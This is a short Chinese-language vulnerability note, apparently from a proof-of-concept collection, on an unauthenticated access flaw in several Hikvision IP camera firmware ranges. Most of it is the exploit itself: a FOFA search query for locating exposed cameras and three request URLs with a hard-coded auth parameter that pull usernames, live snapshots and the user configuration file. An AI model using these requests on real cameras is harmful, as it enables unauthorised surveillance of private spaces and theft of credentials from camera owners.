原理
经典未授权访问,由于敏感路径未对请求者的身份进行验证,导致未授权访问。
影响范围
DS-2CD2xx2F-I Series V5.2.0 build 140721 to V5.4.0 Build 160530
DS-2CD2xx0F-I Series V5.2.0 build 140721 to V5.4.0 Build 160401
DS-2CD2xx2FWD Series V5.3.1 build 150410 to V5.4.4 Build 161125
DS-2CD4x2xFWD Series V5.2.0 build 140721 to V5.4.0 Build 160414
DS-2CD4xx5 Series V5.2.0 build 140721 to V5.4.0 Build 160421
DS-2DFx Series V5.2.0 build 140805 to V5.4.5 Build 160928
DS-2CD63xx Series V5.0.9 build 140305 to V5.3.5 Build 160106
危害
可获取的摄像头敏感信息:
- 用户名
- 摄像头快照
- 摄像头用户配置文件(加密,可用脚本解密)
POC & EXP
fofa
app="HIKVISION-视频监控"
手工
# 获取摄像头用户名
http://摄像头IP地址/Security/users?auth=YWRtaW46MTEK
# 获取监控快照
http://摄像头IP地址/onvif-http/snapshot?auth=YWRtaW46MTEK
# 获取摄像头配置文件
http://摄像头IP地址/System/configurationFile?auth=YWRtaW46MTEK